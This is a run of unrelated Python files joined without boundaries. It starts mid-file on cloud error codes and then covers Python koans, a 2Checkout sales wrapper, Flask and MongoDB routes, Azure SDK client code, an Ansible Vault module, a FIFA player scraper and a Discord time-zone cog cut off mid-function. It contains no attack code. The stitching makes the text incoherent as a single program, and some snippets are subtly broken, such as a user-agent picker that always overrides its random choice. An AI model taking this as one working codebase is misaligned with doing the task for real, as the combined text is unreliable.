UNAUTHORIZEDOPERATION_TEMPCOSAPPID = 'UnauthorizedOperation.TempCosAppid'

# This operation cannot be performed.
UNAUTHORIZEDOPERATION_UPDATEFUNCTIONCODE = 'UnauthorizedOperation.UpdateFunctionCode'

# Unsupported operation.
UNSUPPORTEDOPERATION = 'UnsupportedOperation'

# The resource still has alias bindings; this operation is not supported. Unbind the aliases and retry.
UNSUPPORTEDOPERATION_ALIASBIND = 'UnsupportedOperation.AliasBind'

# The specified AsyncRunEnable configuration is not supported yet; fix it and try again.
UNSUPPORTEDOPERATION_ASYNCRUNENABLE = 'UnsupportedOperation.AsyncRunEnable'

# Cdn is not supported.
UNSUPPORTEDOPERATION_CDN = 'UnsupportedOperation.Cdn'

# The Cos operation is not supported.
UNSUPPORTEDOPERATION_COS = 'UnsupportedOperation.Cos'

# The specified EipFixed configuration is not supported yet.
UNSUPPORTEDOPERATION_EIPFIXED = 'UnsupportedOperation.EipFixed'

# This region is not supported.
UNSUPPORTEDOPERATION_REGION = 'UnsupportedOperation.Region'

# The trigger operation is not supported.
UNSUPPORTEDOPERATION_TRIGGER = 'UnsupportedOperation.Trigger'

# The specified configuration is not supported yet; fix it and try again.
UNSUPPORTEDOPERATION_UPDATEFUNCTIONEVENTINVOKECONFIG = 'UnsupportedOperation.UpdateFunctionEventInvokeConfig'

# The specified VpcConfig configuration is not supported yet.
UNSUPPORTEDOPERATION_VPCCONFIG = 'UnsupportedOperation.VpcConfig'

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from runner.koan import *

class AboutIteration(Koan):
    """Koan exercises covering Python's iteration protocol and the
    built-in iteration helpers: iter/next, map, filter and
    functools.reduce."""

    def test_iterators_are_a_type(self):
        """A for-loop consumes an iterator produced by iter()."""
        it = iter(range(1,6))

        total = 0

        for num in it:
            total += num

        self.assertEqual(15 , total)

    def test_iterating_with_next(self):
        """next() advances an iterator manually; exhaustion raises StopIteration."""
        stages = iter(['alpha','beta','gamma'])

        try:
            self.assertEqual('alpha', next(stages))
            next(stages)  # skips 'beta'
            self.assertEqual('gamma', next(stages))
            next(stages)  # iterator exhausted -> StopIteration
        except StopIteration as ex:
            # NOTE(review): err_msg is only bound when StopIteration fires;
            # the assertion below would raise NameError otherwise.
            err_msg = 'Ran out of iterations'

        self.assertRegex(err_msg, 'Ran out')

    # ------------------------------------------------------------------

    def add_ten(self, item):
        """Helper for the map tests: return item increased by ten."""
        return item + 10

    def test_map_transforms_elements_of_a_list(self):
        """map() returns a lazy map object in Python 3, not a list."""
        seq = [1, 2, 3]
        mapped_seq = list()

        mapping = map(self.add_ten, seq)

        self.assertNotEqual(list, mapping.__class__)
        self.assertEqual(map, mapping.__class__)
        # In Python 3 built in iterator funcs return iterable view objects
        # instead of lists

        for item in mapping:
            mapped_seq.append(item)

        self.assertEqual([11, 12, 13], mapped_seq)

        # Note, iterator methods actually return objects of iter type in
        # python 3. In python 2 map() would give you a list.

    def test_filter_selects_certain_items_from_a_list(self):
        """filter() keeps only the elements for which the predicate is true."""
        def is_even(item):
            return (item % 2) == 0

        seq = [1, 2, 3, 4, 5, 6]
        even_numbers = list()

        for item in filter(is_even, seq):
            even_numbers.append(item)

        self.assertEqual([2,4,6], even_numbers)

    def test_just_return_first_item_found(self):
        """filter() is lazy, so a single next() yields just the first match."""
        def is_big_name(item):
            return len(item) > 4

        names = ["Jim", "Bill", "Clarence", "Doug", "Eli"]
        name = None

        iterator = filter(is_big_name, names)
        try:
            name = next(iterator)
        except StopIteration:
            msg = 'Ran out of big names'

        self.assertEqual("Clarence", name)


    # ------------------------------------------------------------------

    def add(self,accum,item):
        """Helper for the reduce test: running sum."""
        return accum + item

    def multiply(self,accum,item):
        """Helper for the reduce test: running product."""
        return accum * item

    def test_reduce_will_blow_your_mind(self):
        """functools.reduce folds a sequence into a single value."""
        import functools
        # As of Python 3 reduce() has been demoted from a builtin function
        # to the functools module.

        result = functools.reduce(self.add, [2, 3, 4])
        self.assertEqual(int, result.__class__)
        # Reduce() syntax is same as Python 2

        self.assertEqual(9, result)

        result2 = functools.reduce(self.multiply, [2, 3, 4], 1)
        self.assertEqual(24, result2)

        # Extra Credit:
        # Describe in your own words what reduce does.

    # ------------------------------------------------------------------

    def test_use_pass_for_iterations_with_no_body(self):
        """The loop variable remains bound after the loop finishes."""
        for num in range(1,5):
            pass

        self.assertEqual(4, num)

    # ------------------------------------------------------------------

    def test_all_iteration_methods_work_on_any_sequence_not_just_lists(self):
        """map/filter accept any iterable: ranges, file objects, etc."""
        # Ranges are an iterable sequence
        result = map(self.add_ten, range(1,4))
        self.assertEqual([11, 12, 13], list(result))

        try:
            file = open("example_file.txt")

            try:
                def make_upcase(line):
                    return line.strip().upper()
                upcase_lines = map(make_upcase, file.readlines())
                self.assertEqual(["THIS", "IS", "A", "TEST"] , list(upcase_lines))
            finally:
                # Arg, this is ugly.
                # We will figure out how to fix this later.
                file.close()
        except IOError:
            # should never happen
            self.fail()

from api_request import Api
from util import Util
from twocheckout import Twocheckout


class Sale(Twocheckout):
    """Wrapper around the 2Checkout sales API (detail, list, refund, stop,
    comment, ship)."""

    def __init__(self, dict_):
        # Name the base class explicitly: super(self.__class__, self)
        # recurses infinitely as soon as Sale is subclassed, because
        # self.__class__ is then the subclass, not Sale.
        super(Sale, self).__init__(dict_)

    @classmethod
    def find(cls, params=None):
        """Fetch a single sale's detail; returns the response's `sale` attribute."""
        if params is None:
            params = dict()
        response = cls(Api.call('sales/detail_sale', params))
        return response.sale

    @classmethod
    def list(cls, params=None):
        """List sales; returns the response's `sale_summary` attribute."""
        if params is None:
            params = dict()
        response = cls(Api.call('sales/list_sales', params))
        return response.sale_summary

    def refund(self, params=None):
        """Refund this object — most specific id wins: lineitem, then invoice,
        then whole sale. Returns the API response wrapped in a Sale."""
        if params is None:
            params = dict()
        if hasattr(self, 'lineitem_id'):
            params['lineitem_id'] = self.lineitem_id
            url = 'sales/refund_lineitem'
        elif hasattr(self, 'invoice_id'):
            params['invoice_id'] = self.invoice_id
            url = 'sales/refund_invoice'
        else:
            # Whole-sale refunds also go through the invoice endpoint.
            params['sale_id'] = self.sale_id
            url = 'sales/refund_invoice'
        return Sale(Api.call(url, params))

    def stop(self, params=None):
        """Stop recurring billing for this lineitem, or for every active
        lineitem of this sale. Returns a Sale-wrapped status response
        (or, for a single lineitem, the raw API response — preserved for
        backward compatibility)."""
        if params is None:
            params = dict()
        if hasattr(self, 'lineitem_id'):
            params['lineitem_id'] = self.lineitem_id
            return Api.call('sales/stop_lineitem_recurring', params)
        elif hasattr(self, 'sale_id'):
            active_lineitems = Util.active(self)
            if dict(active_lineitems):
                # Stop each active lineitem individually and count successes.
                result = dict()
                i = 0
                for k, v in active_lineitems.items():
                    lineitem_id = v
                    params = {'lineitem_id': lineitem_id}
                    result[i] = Api.call('sales/stop_lineitem_recurring', params)
                    i += 1
                response = { "response_code": "OK",
                             "response_message": str(len(result)) + " lineitems stopped successfully"
                }
            else:
                response = {
                    "response_code": "NOTICE",
                    "response_message": "No active recurring lineitems"
                }
        else:
            response = { "response_code": "NOTICE",
                          "response_message": "This method can only be called on a sale or lineitem"
            }
        return Sale(response)

    def active(self):
        """Report which recurring lineitems on this sale are active."""
        active_lineitems = Util.active(self)
        if dict(active_lineitems):
            result = dict()
            i = 0
            for k, v in active_lineitems.items():
                lineitem_id = v
                result[i] = lineitem_id
                i += 1
            response = { "response_code": "ACTIVE",
                         "response_message": str(len(result)) + " active recurring lineitems"
            }
        else:
            response = {
                "response_code": "NOTICE","response_message":
                "No active recurring lineitems"
            }
        return Sale(response)

    def comment(self, params=None):
        """Attach a comment to this sale."""
        if params is None:
            params = dict()
        params['sale_id'] = self.sale_id
        return Sale(Api.call('sales/create_comment', params))

    def ship(self, params=None):
        """Mark this sale as shipped."""
        if params is None:
            params = dict()
        params['sale_id'] = self.sale_id
        return Sale(Api.call('sales/mark_shipped', params))

import json
import os

from flask import request, g, render_template, make_response, jsonify, Response
from helpers.raw_endpoint import get_id, store_json_to_file
from helpers.groups import get_groups
from json_controller import JSONController
from main import app
from pymongo import MongoClient, errors


# Absolute directory of this module; anchors the raw-payload storage path.
HERE = os.path.dirname(os.path.abspath(__file__))


# setup database connection
def connect_client():
    """Connects to Mongo client"""
    try:
        return MongoClient(app.config['DB_HOST'], int(app.config['DB_PORT']))
    except errors.ConnectionFailure as e:
        raise e


def get_db():
    """Connects to Mongo database"""
    # Lazily create one client per app context and cache it (plus the db and
    # groups collection handles) on flask.g; teardown closes the client.
    if not hasattr(g, 'mongo_client'):
        g.mongo_client = connect_client()
        g.mongo_db = getattr(g.mongo_client, app.config['DB_NAME'])
        # NOTE(review): the groups collection name comes from the process
        # environment rather than app.config — confirm this is intentional.
        g.groups_collection = g.mongo_db[os.environ.get('DB_GROUPS_COLLECTION')]
    return g.mongo_db

@app.teardown_appcontext
def close_db(error):
    """Closes connection with Mongo client"""
    client = getattr(g, 'mongo_client', None)
    if client is not None:
        client.close()

# Begin view routes
# Begin view routes
@app.route('/')
@app.route('/index/')
def index():
    """Landing page for SciNet"""
    template_name = "index.html"
    return render_template(template_name)

@app.route('/faq/')
def faq():
    """FAQ page for SciNet"""
    template_name = "faq.html"
    return render_template(template_name)

@app.route('/leaderboard/')
def leaderboard():
    """Leaderboard page for SciNet"""
    get_db()  # side effect: populates g.groups_collection
    group_list = get_groups(g.groups_collection)
    return render_template("leaderboard.html", groups=group_list)

@app.route('/ping', methods=['POST'])
def ping_endpoint():
    """API endpoint determines potential article hash exists in db

    :return: status code 204 -- hash not present, continue submission
    :return: status code 201 -- hash already exists, drop submission
    """
    db = get_db()
    target_hash = request.form.get('hash')
    already_known = bool(db.raw.find({'hash': target_hash}).count())
    return Response(status=201 if already_known else 204)

@app.route('/articles')
def ArticleEndpoint():
    """Eventual landing page for searching/retrieving articles"""
    # The route registers only GET (Flask's default), so this check always
    # holds; other verbs get a 405 from Flask before reaching this body.
    # NOTE(review): if more methods are ever added, the non-GET path falls
    # through and returns None — add an explicit response then.
    if request.method == 'GET':
        return render_template("articles.html")

@app.route('/raw', methods=['POST'])
def raw_endpoint():
    """API endpoint for submitting raw article data

    :return: status code 405 - invalid JSON or invalid request type
    :return: status code 400 - unsupported content-type or invalid publisher
    :return: status code 201 - successful submission
    """
    # Ensure post's content-type is supported. Using .get() avoids an
    # uncaught KeyError (and a 500 response) when the header is missing;
    # a missing header now falls through to the 400 branch.
    if request.headers.get('content-type') == 'application/json':
        # Ensure data is a valid JSON
        try:
            user_submission = json.loads(request.data)
        except ValueError:
            return Response(status=405)
        # generate UID for new entry
        uid = get_id()
        # store incoming JSON in raw storage
        file_path = os.path.join(
                        HERE,
                        'raw_payloads',
                        str(uid)
                    )
        store_json_to_file(user_submission, file_path)
        # hand submission to controller and return Response
        db = get_db()
        controller_response = JSONController(user_submission, db=db, _id=uid).submit()
        return controller_response

    # User submitted an unsupported content-type
    else:
        return Response(status=400)

#@TODO: Implicit or Explicit group additions? Issue #51 comments on the issues page
#@TODO: Add form validation
@app.route('/requestnewgroup/', methods=['POST'])
def request_new_group():
    """Accept a new-group request; builds the notification message.

    Email delivery is currently disabled (see the quoted block below), so
    the endpoint acknowledges receipt unconditionally with a 200.
    """
    # Grab submission form data and prepare email message
    data = request.json
    # Fixed grammar in the outgoing message: "has request" -> "has requested".
    msg = "Someone has requested that you add {group_name} to the leaderboard \
        groups. The groups website is {group_website} and the submitter can \
        be reached at {submitter_email}.".format(
                                            group_name=data['new_group_name'],
                                            group_website=data['new_group_website'],
                                            submitter_email=data['submitter_email'])
    return Response(status=200)
    '''
    try:
        email(
            subject="SciNet: A new group has been requested",
            fro="no-reply@scinet.osf.io",
            to='harry@scinet.osf.io',
            msg=msg)
        return Response(status=200)
    except:
        return Response(status=500)
    '''

# Error handlers
@app.errorhandler(404)
def not_found(error):
    """JSON body for 404 responses."""
    payload = jsonify({'error': 'Page Not Found'})
    return make_response(payload, 404)

@app.errorhandler(405)
def method_not_allowed(error):
    """JSON body for 405 responses."""
    payload = jsonify({'error': 'Method Not Allowed'})
    return make_response(payload, 405)
from corecat.constants import OBJECT_CODES, MODEL_VERSION
from ._sqlalchemy import Base, CoreCatBaseMixin
from ._sqlalchemy import Column, \
    Integer, \
    String, Text


class Project(CoreCatBaseMixin, Base):
    """Project Model class represent for the 'projects' table
    which is used to store project's basic information."""

    # Add the real table name here.
    # TODO: Add the database prefix here
    __tablename__ = 'project'

    # Column definition
    # Surrogate primary key, mapped to the 'id' column.
    project_id = Column('id', Integer,
                        primary_key=True,
                        autoincrement=True
                        )
    project_name = Column('name', String(100),
                          nullable=False
                          )
    project_description = Column('description', Text,
                                 nullable=True
                                 )

    # Relationship
    # TODO: Building relationship

    def __init__(self, project_name,
                 created_by_user_id,
                 **kwargs):
        """
        Constructor of Project Model Class.

        :param project_name: Name of the project.
        :param created_by_user_id: Project is created under this user ID.
        :keyword project_description: Optional description of the project,
            read from ``kwargs`` (defaults to None).
        """

        # Version/audit bookkeeping is provided by CoreCatBaseMixin.
        self.set_up_basic_information(
            MODEL_VERSION[OBJECT_CODES['Project']],
            created_by_user_id
        )
        self.project_name = project_name
        self.project_description = kwargs.get('project_description', None)

#!/usr/bin/env python
from ansible.module_utils.hashivault import hashivault_argspec
from ansible.module_utils.hashivault import hashivault_auth_client
from ansible.module_utils.hashivault import hashivault_init
from ansible.module_utils.hashivault import hashiwrapper

# Module metadata and docs consumed by Ansible tooling (ansible-doc);
# the YAML payloads below are data, not comments — leave content unchanged.
ANSIBLE_METADATA = {'status': ['stableinterface'], 'supported_by': 'community', 'version': '1.1'}
DOCUMENTATION = '''
---
module: hashivault_approle_role_get
version_added: "3.8.0"
short_description: Hashicorp Vault approle role get module
description:
    - Module to get a approle role from Hashicorp Vault.
options:
    name:
        description:
            - role name.
    mount_point:
        description:
            - mount point for role
        default: approle
extends_documentation_fragment: hashivault
'''
EXAMPLES = '''
---
- hosts: localhost
  tasks:
    - hashivault_approle_role_get:
        name: 'ashley'
      register: 'vault_approle_role_get'
    - debug: msg="Role is {{vault_approle_role_get.role}}"
'''


def main():
    """Module entry point: build the argspec, run the lookup, report back."""
    argspec = hashivault_argspec()
    argspec.update(
        name=dict(required=True, type='str'),
        mount_point=dict(required=False, type='str', default='approle'),
    )
    module = hashivault_init(argspec)
    result = hashivault_approle_role_get(module.params)
    # fail_json / exit_json both terminate the module run.
    reporter = module.fail_json if result.get('failed') else module.exit_json
    reporter(**result)


@hashiwrapper
def hashivault_approle_role_get(params):
    """Fetch one approle role from Vault and wrap it for Ansible."""
    client = hashivault_auth_client(params)
    role = client.get_role(
        params.get('name'),
        mount_point=params.get('mount_point'),
    )
    return {'role': role}


# Standard Ansible module entry point.
if __name__ == '__main__':
    main()

from scrapy.spiders import Spider
from scrapy.selector import Selector
from scrapy.http import HtmlResponse
from FIFAscrape.items import PlayerItem
from urlparse import urlparse, urljoin
from scrapy.http.request import Request
from scrapy.conf import settings
import random
import time

class fifaSpider(Spider):
    name = "fifa"
    allowed_domains = ["futhead.com"]
    start_urls = [
        "http://www.futhead.com/16/players/?level=all_nif&bin_platform=ps"
    ]
	

    def parse(self, response):
        #obtains links from page to page and passes links to parse_playerURL
        sel = Selector(response)    #define selector based on response object (points to urls in start_urls by default) 
        url_list = sel.xpath('//a[@class="display-block padding-0"]/@href')   #obtain a list of href links that contain relative links of players
        for i in url_list:
            relative_url = self.clean_str(i.extract())    #i is a selector and hence need to extract it to obtain unicode object
            print urljoin(response.url, relative_url)   #urljoin is able to merge absolute and relative paths to form 1 coherent link
            req = Request(urljoin(response.url, relative_url),callback=self.parse_playerURL)   #pass on request with new urls to parse_playerURL
            req.headers["User-Agent"] = self.random_ua()    
            yield req
        
        next_url=sel.xpath('//div[@class="right-nav pull-right"]/a[@rel="next"]/@href').extract_first()  
        if(next_url):                                                                       #checks if next page exists
            clean_next_url = self.clean_str(next_url)
            reqNext = Request(urljoin(response.url, clean_next_url),callback=self.parse)    #calls back this function to repeat process on new list of links
            yield reqNext
         
    def parse_playerURL(self, response):    
        #parses player specific data into items list
        site = Selector(response)
        items = []
        item = PlayerItem()
        item['1name'] = (response.url).rsplit("/")[-2].replace("-"," ")
        title = self.clean_str(site.xpath('/html/head/title/text()').extract_first())
        item['OVR'] = title.partition("FIFA 16 -")[1].split("-")[0]
        item['POS'] = self.clean_str(site.xpath('//div[@class="playercard-position"]/text()').extract_first())
        #stats = site.xpath('//div[@class="row player-center-container"]/div/a')
        stat_names = site.xpath('//span[@class="player-stat-title"]')
        stat_values = site.xpath('//span[contains(@class, "player-stat-value")]')
        for index in range(len(stat_names)):
            attr_name = stat_names[index].xpath('.//text()').extract_first()
            item[attr_name] = stat_values[index].xpath('.//text()').extract_first()
        items.append(item)
        return items
        
    def clean_str(self,ustring):    
        #removes wierd unicode chars (/u102 bla), whitespaces, tabspaces, etc to form clean string 
        return str(ustring.encode('ascii', 'replace')).strip()
        
    def random_ua(self):
        #randomise user-agent from list to reduce chance of being banned
        ua  = random.choice(settings.get('USER_AGENT_LIST'))
        if ua:
            ua='Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'
        return ua
        

# NOTE(review): stray debug output emitted at import time — confirm and remove.
print("hello!!!!")
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from copy import deepcopy
from typing import Any, Awaitable, Optional, TYPE_CHECKING

from azure.core.rest import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer

from .. import models
from ._configuration import SqlVirtualMachineManagementClientConfiguration
from .operations import AvailabilityGroupListenersOperations, Operations, SqlVirtualMachineGroupsOperations, SqlVirtualMachinesOperations

if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from azure.core.credentials_async import AsyncTokenCredential

class SqlVirtualMachineManagementClient:
    """The SQL virtual machine management API provides a RESTful set of web APIs that interact with Azure Compute, Network & Storage services to manage your SQL Server virtual machine. The API enables users to create, delete and retrieve a SQL virtual machine, SQL virtual machine group or availability group listener.

    :ivar availability_group_listeners: AvailabilityGroupListenersOperations operations
    :vartype availability_group_listeners:
     azure.mgmt.sqlvirtualmachine.aio.operations.AvailabilityGroupListenersOperations
    :ivar operations: Operations operations
    :vartype operations: azure.mgmt.sqlvirtualmachine.aio.operations.Operations
    :ivar sql_virtual_machine_groups: SqlVirtualMachineGroupsOperations operations
    :vartype sql_virtual_machine_groups:
     azure.mgmt.sqlvirtualmachine.aio.operations.SqlVirtualMachineGroupsOperations
    :ivar sql_virtual_machines: SqlVirtualMachinesOperations operations
    :vartype sql_virtual_machines:
     azure.mgmt.sqlvirtualmachine.aio.operations.SqlVirtualMachinesOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param subscription_id: Subscription ID that identifies an Azure subscription.
    :type subscription_id: str
    :param base_url: Service URL. Default value is 'https://management.azure.com'.
    :type base_url: str
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: str = "https://management.azure.com",
        **kwargs: Any
    ) -> None:
        self._config = SqlVirtualMachineManagementClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)

        # Register every generated model class once so the serializer and
        # deserializer share a single type registry.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)
        self._serialize.client_side_validation = False
        # Each operation group shares the same pipeline client and (de)serializers.
        self.availability_group_listeners = AvailabilityGroupListenersOperations(self._client, self._config, self._serialize, self._deserialize)
        self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
        self.sql_virtual_machine_groups = SqlVirtualMachineGroupsOperations(self._client, self._config, self._serialize, self._deserialize)
        self.sql_virtual_machines = SqlVirtualMachinesOperations(self._client, self._config, self._serialize, self._deserialize)


    def _send_request(
        self,
        request: HttpRequest,
        **kwargs: Any
    ) -> Awaitable[AsyncHttpResponse]:
        """Runs the network request through the client's chained policies.

        >>> from azure.core.rest import HttpRequest
        >>> request = HttpRequest("GET", "https://www.example.org/")
        <HttpRequest [GET], url: 'https://www.example.org/'>
        >>> response = await client._send_request(request)
        <AsyncHttpResponse: 200 OK>

        For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart

        :param request: The network request you want to make. Required.
        :type request: ~azure.core.rest.HttpRequest
        :keyword bool stream: Whether the response payload will be streamed. Defaults to False.
        :return: The response of your network call. Does not do error handling on your response.
        :rtype: ~azure.core.rest.AsyncHttpResponse
        """

        # Copy so the caller's request object is never mutated.
        request_copy = deepcopy(request)
        request_copy.url = self._client.format_url(request_copy.url)
        return self._client.send_request(request_copy, **kwargs)

    async def close(self) -> None:
        """Close the underlying pipeline client and its transport."""
        await self._client.close()

    async def __aenter__(self) -> "SqlVirtualMachineManagementClient":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)

from flask import Blueprint, request, render_template
from ..load import processing_results
from ..abbr import get_abbr_map

# Abbreviation map is loaded once at import time and reused per request.
abbr_map = get_abbr_map()
liner_mod = Blueprint('liner', __name__, template_folder='templates', static_folder='static')


@liner_mod.route('/liner', methods=['GET', 'POST'])
def liner():
    """Render the liner page; on POST, analyse the '.'-separated text."""
    if request.method != 'POST':
        return render_template('projects/line.html')

    query = request.form['liner-text']
    # Sentences are delimited by '.'; the trailing fragment is discarded.
    text = query.split('.')[:-1]
    if not text:
        return render_template('projects/line.html', message='Please separate each line with "."')

    # Expand known abbreviations token by token; each token (expanded or
    # not) is followed by a single space, matching the original output.
    expanded = [abbr_map[token] if token in abbr_map else token
                for token in query.split()]
    abbr_expanded_text = "".join(token + " " for token in expanded)

    data, emotion_sents, score, line_sentiment, text, length = processing_results(text)
    return render_template('projects/line.html', data=[data, emotion_sents, score, zip(text, line_sentiment), length, abbr_expanded_text])

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.serialization import Model


class Dimension(Model):
    """Dimension of a resource metric. For e.g. instance specific HTTP requests
    for a web app,
    where instance name is dimension of the metric HTTP request.

    :param name:
    :type name: str
    :param display_name:
    :type display_name: str
    :param internal_name:
    :type internal_name: str
    :param to_be_exported_for_shoebox:
    :type to_be_exported_for_shoebox: bool
    """

    # Maps attribute names to their serialized JSON keys and wire types
    # (consumed by msrest's Serializer/Deserializer).
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'internal_name': {'key': 'internalName', 'type': 'str'},
        'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
    }

    def __init__(self, name=None, display_name=None, internal_name=None, to_be_exported_for_shoebox=None):
        super(Dimension, self).__init__()
        self.name = name
        self.display_name = display_name
        self.internal_name = internal_name
        self.to_be_exported_for_shoebox = to_be_exported_for_shoebox

import asyncio
import discord
import datetime
import pytz
from   discord.ext import commands
from   Cogs import FuzzySearch
from   Cogs import Settings
from   Cogs import DisplayName
from   Cogs import Message
from   Cogs import Nullify

class Time:
	"""Discord cog: per-user TimeZone / UTC-offset commands and lookups."""

	# Init with the bot reference, and a reference to the settings var
	def __init__(self, bot, settings):
		self.bot = bot
		self.settings = settings


	@commands.command(pass_context=True)
	async def settz(self, ctx, *, tz : str = None):
		"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
		# NOTE(review): `usage` is built but never sent — presumably meant
		# for an error reply; confirm before removing.
		usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
		if not tz:
			# No argument clears the stored TimeZone.
			self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
			await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
			return

		# Let's get the timezone list
		tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
		if not tz_list[0]['Ratio'] == 1:
			# We didn't find a complete match
			msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
			for tz in tz_list:
				msg += tz['Item'] + "\n"
			msg += '```'
			await ctx.channel.send(msg)
			return
		# We got a time zone
		self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
		await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))


	@commands.command(pass_context=True)
	async def listtz(self, ctx, *, tz_search = None):
		"""List all the supported TimeZones in PM."""

		if not tz_search:
			# No filter given: list every pytz zone.
			msg = "__Available TimeZones:__\n\n"
			for tz in pytz.all_timezones:
				msg += tz + "\n"
		else:
			tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
			msg = "__Top 3 TimeZone Matches:__\n\n"
			for tz in tz_list:
				msg += tz['Item'] + "\n"

		await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)


	@commands.command(pass_context=True)
	async def tz(self, ctx, *, member = None):
		"""See a member's TimeZone."""
		# Check if we're suppressing @here and @everyone mentions
		if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
			suppress = True
		else:
			suppress = False

		if member == None:
			member = ctx.message.author

		if type(member) == str:
			# Try to get a user first
			memberName = member
			member = DisplayName.memberForName(memberName, ctx.message.guild)
			if not member:
				msg = 'Couldn\'t find user *{}*.'.format(memberName)
				# Check for suppress
				if suppress:
					msg = Nullify.clean(msg)
				await ctx.channel.send(msg)
				return

		# We got one
		timezone = self.settings.getGlobalUserStat(member, "TimeZone")
		if timezone == None:
			msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
			await ctx.channel.send(msg)
			return

		msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
		await ctx.channel.send(msg)


	@commands.command(pass_context=True)
	async def setoffset(self, ctx, *, offset : str = None):
		"""Set your UTC offset."""

		if offset == None:
			# No argument clears the stored offset.
			self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
			msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
			await ctx.channel.send(msg)
			return

		offset = offset.replace('+', '')

		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				await ctx.channel.send('Offset has to be in +-H:M!')
				return
		# NOTE(review): stored without zero-padding, e.g. "5:0" for 5 hours.
		off = "{}:{}".format(hours, minutes)
		self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
		msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
		await ctx.channel.send(msg)


	@commands.command(pass_context=True)
	async def offset(self, ctx, *, member = None):
		"""See a member's UTC offset."""

		# Check if we're suppressing @here and @everyone mentions
		if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
			suppress = True
		else:
			suppress = False

		if member == None:
			member = ctx.message.author

		if type(member) == str:
			# Try to get a user first
			memberName = member
			member = DisplayName.memberForName(memberName, ctx.message.guild)
			if not member:
				msg = 'Couldn\'t find user *{}*.'.format(memberName)
				# Check for suppress
				if suppress:
					msg = Nullify.clean(msg)
				await ctx.channel.send(msg)
				return

		# We got one
		offset = self.settings.getGlobalUserStat(member, "UTCOffset")
		if offset == None:
			msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
			await ctx.channel.send(msg)
			return

		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				await ctx.channel.send('Offset has to be in +-H:M!')
				return

		msg = 'UTC'
		# Apply offset
		if hours > 0:
			# Apply positive offset
			msg += '+{}'.format(offset)
		elif hours < 0:
			# Apply negative offset
			msg += '{}'.format(offset)

		msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
		await ctx.channel.send(msg)


	@commands.command(pass_context=True)
	async def time(self, ctx, *, offset : str = None):
		"""Get UTC time +- an offset."""
		timezone = None
		if offset == None:
			member = ctx.message.author
		else:
			# Try to get a user first
			member = DisplayName.memberForName(offset, ctx.message.guild)

		if member:
			# We got one
			# Check for timezone first
			offset = self.settings.getGlobalUserStat(member, "TimeZone")
			if offset == None:
				offset = self.settings.getGlobalUserStat(member, "UTCOffset")

		if offset == None:
			msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
			await ctx.channel.send(msg)
			return

		# At this point - we need to determine if we have an offset - or possibly a timezone passed
		t = self.getTimeFromTZ(offset)
		if t == None:
			# We did not get an offset
			t = self.getTimeFromOffset(offset)
			if t == None:
				await ctx.channel.send("I couldn't find that TimeZone or offset!")
				return

		if member:
